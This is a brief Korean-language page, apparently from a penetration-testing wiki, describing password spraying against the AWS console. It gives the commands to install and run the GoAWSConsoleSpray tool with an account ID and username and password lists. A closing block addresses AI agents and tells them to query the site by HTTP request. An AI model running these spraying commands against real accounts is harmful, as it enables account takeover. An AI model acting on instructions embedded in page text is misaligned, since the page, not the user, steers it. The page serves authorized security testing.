# Password Spraying

AWS 계정의 Account Id를 알고있을 때 패스워드 스프레이 공격이 가능합니다.

## Abuse

<pre class="language-bash"><code class="lang-bash"><strong># 패스워드 스프레이 도구 설치
</strong>go install github.com/WhiteOakSecurity/GoAWSConsoleSpray@latest

<strong># 스프레이 공격 (Account Id, username, password 필요)
</strong>GoAWSConsoleSpray -a '&#x3C;account-id>' -u '&#x3C;username-file>' -p '&#x3C;password-file>'
</code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/cloud/aws/password-spraying.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
